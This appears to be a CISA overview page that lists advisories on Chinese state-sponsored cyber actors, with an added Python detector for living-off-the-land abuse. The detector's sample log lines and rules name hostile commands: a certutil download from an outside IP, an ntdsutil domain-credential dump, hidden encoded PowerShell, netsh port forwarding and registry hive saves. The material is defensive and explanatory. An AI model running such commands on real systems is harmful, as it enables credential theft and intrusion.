China Cyber Threat Overview and Advisories | CISA (2024)

September 27, 2023

Joint Cybersecurity Advisory: People's Republic of China-Linked Cyber Actors Hide in Router Firmware

The U.S. National Security Agency (NSA), Federal Bureau of Investigation (FBI), and Cybersecurity and Infrastructure Security Agency (CISA), along with the Japan National Police Agency (NPA) and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC), released a joint Cybersecurity Advisory (CSA). The CSA details activity by cyber actors known as BlackTech, linked to the People's Republic of China (PRC). The advisory provides BlackTech tactics, techniques, and procedures (TTPs) and urges multinational corporations to review all subsidiary connections, verify access, and consider implementing zero trust models to limit the extent of a potential BlackTech compromise.

May 24, 2023

Joint Cybersecurity Advisory: People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection

This advisory focuses on a tactic called living off the land (LOTL): a set of techniques in which cyber actors rely on tools already present in the environment (built-in administration utilities, scripting hosts, and other system binaries) instead of deploying custom malware, so that their activity blends in with legitimate administrative work and evades signature-based detection.
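Because LOTL activity uses legitimate binaries, detection has to look at how a built-in tool is invoked (its arguments and its parent process) rather than at the binary itself. The following Python detector is an added example written for this page; it is not code from the CISA advisory. The process-creation records are constructed sample lines in a simple key=value form, and the rule set is an illustrative selection of commonly abused Windows built-ins and argument patterns chosen by the editor, not a list taken from the advisory.

```python
import re
from typing import Dict, List

# Constructed process-creation records (not real telemetry, not from the advisory).
# Inner quoting of the ntdsutil arguments is omitted to keep the sample format simple.
SAMPLE_EVENTS = [
    'ts=2023-05-24T10:01:02Z host=WS01 user=CORP\\alice parent=explorer.exe image=notepad.exe cmd="notepad.exe notes.txt"',
    'ts=2023-05-24T10:03:15Z host=WS01 user=CORP\\alice parent=cmd.exe image=certutil.exe cmd="certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\\Users\\Public\\a.txt"',
    'ts=2023-05-24T10:04:40Z host=DC01 user=CORP\\svc_backup parent=cmd.exe image=ntdsutil.exe cmd="ntdsutil.exe ac i ntds ifm create full C:\\temp\\x q q"',
    'ts=2023-05-24T10:05:01Z host=WS02 user=CORP\\bob parent=WINWORD.EXE image=powershell.exe cmd="powershell.exe -nop -w hidden -enc SQBFAFgA"',
    'ts=2023-05-24T10:06:30Z host=WS02 user=CORP\\bob parent=services.exe image=netsh.exe cmd="netsh.exe interface portproxy add v4tov4 listenport=4443 connectaddress=10.0.0.5 connectport=443"',
    'ts=2023-05-24T10:07:12Z host=WS03 user=CORP\\carol parent=cmd.exe image=certutil.exe cmd="certutil.exe -hashfile C:\\tools\\setup.exe SHA256"',
]

# Illustrative argument patterns per built-in (editor's assumption, not an advisory list).
# Each pattern captures a use of the tool that is rare in normal administration:
# download/decode with certutil, NTDS dumping, hidden or encoded PowerShell, port forwarding.
LOLBIN_RULES: Dict[str, List[str]] = {
    "certutil.exe": [r"-urlcache", r"-decode\b", r"-encode\b"],
    "ntdsutil.exe": [r"\bac\s+i\s+ntds\b", r"\bifm\b"],
    "powershell.exe": [r"-enc(odedcommand)?\b", r"-w(indowstyle)?\s+hidden", r"downloadstring|\biex\b|invoke-expression"],
    "netsh.exe": [r"\bportproxy\b"],
    "wmic.exe": [r"process\s+call\s+create", r"/node:"],
    "rundll32.exe": [r"javascript:", r"https?://"],
    "reg.exe": [r"save\s+hklm\\(sam|security|system)\b"],
}

# Parent/child pairs that are suspicious regardless of arguments.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# key=value pairs; a double-quoted value may contain spaces and '=' characters.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed key=value record into a dict, stripping quotes."""
    fields: Dict[str, str] = {}
    for key, value in FIELD_RE.findall(line):
        fields[key] = value[1:-1] if value.startswith('"') else value
    return fields


def detect(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like LOTL abuse (empty list if none)."""
    image = event.get("image", "").lower()
    parent = event.get("parent", "").lower()
    cmd = event.get("cmd", "")
    reasons: List[str] = []
    for pattern in LOLBIN_RULES.get(image, []):
        if re.search(pattern, cmd, re.IGNORECASE):
            reasons.append(f"{image}: argument pattern /{pattern}/")
    if image in SCRIPT_HOSTS and parent in OFFICE_PARENTS:
        reasons.append(f"{image}: spawned by Office process {parent}")
    return reasons


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run the detector over raw log lines and return one alert per flagged event."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        event = parse_event(line)
        reasons = detect(event)
        if reasons:
            alerts.append({
                "ts": event.get("ts"),
                "host": event.get("host"),
                "user": event.get("user"),
                "image": event.get("image", "").lower(),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['ts']} {alert['host']} {alert['user']} {alert['image']}")
        for reason in alert["reasons"]:
            print(f"    {reason}")
```

Note that the last sample line, a legitimate `certutil -hashfile`, is not flagged: the rules key on the arguments that matter (download, decode, dump, hide), which is what keeps a dual-use binary from generating an alert on every run. In a real deployment the same logic would consume Sysmon Event ID 1 or Windows Security Event 4688 records, and the pattern list would be tuned against a baseline of the organisation's own administrative activity.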


October 6, 2022

Joint Cybersecurity Advisory: Top CVEs Actively Exploited By People's Republic of China State-Sponsored Cyber Actors

CISA, NSA, and FBI released an advisory providing the top Common Vulnerabilities and Exposures (CVEs) exploited since 2020 by People's Republic of China (PRC) state-sponsored cyber actors.

June 7, 2022

Joint Cybersecurity Advisory: People's Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

CISA, NSA, and FBI released an advisory describing the ways in which PRC state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure.

August 20, 2021

Joint Cybersecurity Advisory: Chinese Observed TTPs

CISA, NSA, and FBI released an advisory describing Chinese cyber threat behavior and trends and providing mitigations to help protect the Federal Government; state, local, tribal, and territorial governments; critical infrastructure; the defense industrial base; and private industry organizations.

July 21, 2021

Joint Cybersecurity Advisory: Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013

CISA and FBI released an advisory providing information on a spearphishing and intrusion campaign conducted by state-sponsored Chinese actors from December 2011 to 2013, targeting U.S. oil and natural gas (ONG) pipeline companies.

July 20, 2021

Joint Cybersecurity Advisory: TTPs of Indicted APT40 Actors Associated with China's MSS Hainan State Security Department

CISA and FBI released an advisory to help network defenders identify and remediate APT40 intrusions and established footholds. See the July 19, 2021, Department of Justice press release.

July 19, 2021

Joint CISA Insights: Chinese Cyber Threat Overview for Leaders

CISA, NSA, and FBI released a joint CISA Insights to help leaders understand this threat and how to reduce their organization's risk of falling victim to cyber espionage and data theft.

March 03, 2021

CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities

CISA partners observed active exploitation of vulnerabilities in Microsoft Exchange Server products. This Alert includes tactics, techniques, and procedures and indicators of compromise associated with this activity. See the July 19, 2021, White House Statement.

October 1, 2020

CISA Alert: Potential for China Cyber Response to Heightened U.S.-China Tensions

In light of heightened tensions between the United States and China, CISA released an Alert providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs). The Alert also includes recommended mitigations for the cybersecurity community to assist in the protection of the Nation's critical infrastructure.

September 14, 2020

Joint Cybersecurity Advisory: Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity

CISA has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known TTPs to target U.S. government agencies. This advisory identifies some of the more common TTPs employed by cyber threat actors, including those affiliated with the Chinese MSS.

August 3, 2020

MAR-10292089-1.v2 – Chinese Remote Access Trojan: TAIDOOR

CISA, FBI, and DoD released a Malware Analysis Report (MAR) describing Chinese government actors using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation.

May 13, 2020

CISA and FBI Joint Public Service Announcement: People's Republic of China (PRC) Targeting of COVID-19 Research Organizations

CISA and FBI issued a Public Service Announcement warning the healthcare, pharmaceutical, and research sectors working on the COVID-19 response of likely targeting and attempted network compromise by the PRC.

February 2019

CISA Webinar: Chinese Cyber Activity Targeting Managed Service Providers

CISA Webinar Slide Deck: Chinese Cyber Activity Targeting Managed Service Providers

CISA provided a webinar on Chinese state-sponsored cyber actors targeting managed service providers (MSPs) and their customers. This campaign is referred to as CLOUD HOPPER.

October 3, 2018

CISA Alert: Advanced Persistent Threat Activity Exploiting Managed Service Providers

CISA Alert: Using Rigorous Credential Control to Mitigate Trusted Network Exploitation

These Alerts address the CLOUD HOPPER campaign. Since May 2016, APT actors have used various TTPs to attempt to infiltrate the networks of global MSPs for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including IT, Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.

April 27, 2017

CISA Alert: Intrusions Affecting Multiple Victims Across Multiple Sectors

This Alert provides information on a campaign in which Chinese government cyber threat actors exploited trust relationships between IT service providers, such as MSPs and cloud service providers, and their customers. Chinese cyber actors associated with the Chinese MSS carried out a campaign of cyber-enabled theft targeting global technology service providers and their customers. The actors gained access to multiple U.S. and global IT service providers and their customers in an effort to steal the intellectual property and sensitive data of companies located in at least 12 countries.

Taken together, the advisories and alerts above form a series of joint products focused on the activities and tactics of Chinese state-sponsored cyber actors. They are released collaboratively by CISA, NSA, FBI, and partner agencies to warn about specific threats and the tactics, techniques, and procedures (TTPs) these actors use. The key concepts covered are:

  1. BlackTech: A group of cyber actors associated with the People’s Republic of China (PRC). Advisories detail their tactics, urging corporations to review connections and consider implementing zero trust models to limit potential compromises.

  2. Living off the Land (LOTL): A tactic in which cyber actors abuse tools already present in the environment instead of deploying custom malware, so that their activity blends in with legitimate administration and evades detection. It is the subject of the May 2023 advisory on PRC state-sponsored cyber activity.

  3. Common Vulnerabilities and Exposures (CVEs): Specific publicly known vulnerabilities actively exploited by PRC state-sponsored cyber actors. The October 2022 advisory lists the top CVEs these actors have used since 2020.

  4. Exploitation of Network Providers and Devices: Chinese cyber actors' exploitation of publicly known vulnerabilities to compromise infrastructure, establish networks, and conduct cyber espionage.

  5. Observed Tactics, Techniques, and Procedures (TTPs): Advisories describe Chinese cyber threat behavior, trends, and provide mitigations to protect government, critical infrastructure, defense organizations, and private industry.

  6. Specific Campaigns: Various campaigns and intrusions are highlighted, such as the Gas Pipeline Intrusion Campaign targeting US oil and natural gas pipeline companies and the APT40 intrusions associated with China’s MSS Hainan State Security Department.

  7. Malware and Trojans: Descriptions of specific malware variants like TAIDOOR used by Chinese government actors to maintain a presence and exploit victim networks.

  8. Targeted Sectors and Entities: The advisories warn about specific sectors targeted by Chinese cyber actors, including managed service providers (MSPs), critical infrastructure (IT, Energy, Healthcare, Communications, Critical Manufacturing), and companies engaged in COVID-19 research.

  9. CLOUD HOPPER Campaign: A campaign targeting MSPs and their customers, involving cyber espionage and intellectual property theft by Chinese state-sponsored actors.

These advisories collectively provide detailed insights into the tactics, strategies, and targets of Chinese state-sponsored cyber actors over a span of years, aiming to equip organizations with the knowledge to bolster their cybersecurity defenses against these threats.
